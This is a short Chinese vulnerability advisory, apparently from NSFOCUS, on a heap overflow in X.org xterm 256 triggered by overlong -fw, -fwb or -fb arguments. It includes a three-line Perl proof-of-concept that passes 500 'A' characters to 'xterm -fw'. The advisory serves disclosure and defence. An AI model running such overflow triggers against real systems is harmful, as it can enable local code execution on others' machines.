|
Xterm超长命令参数堆溢出漏洞
发布日期:2010-09-01
更新日期:2010-09-02
受影响系统:X.org xterm 256 描述:
xterm程序是X窗口系统的终端模拟器,可为无法直接使用窗口系统的程序提供DEC VT102与Tektronix 4014兼容的终端。
本地攻击者可以向Xterm的-fw、-fwb或-fb命令行选项提交超长参数触发堆溢出,导致执行任意代码。
<*来源:Celil Ünüver
链接:http://marc.info/?l=full-disclosure&m=128335164803642&q=p5
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! $file = "A" x 500;
$print = "xterm -fw $file";
system $print;
建议:
厂商补丁:
X.org
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.x.org/
浏览次数:299
严重程度:0(网友投票)
|
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
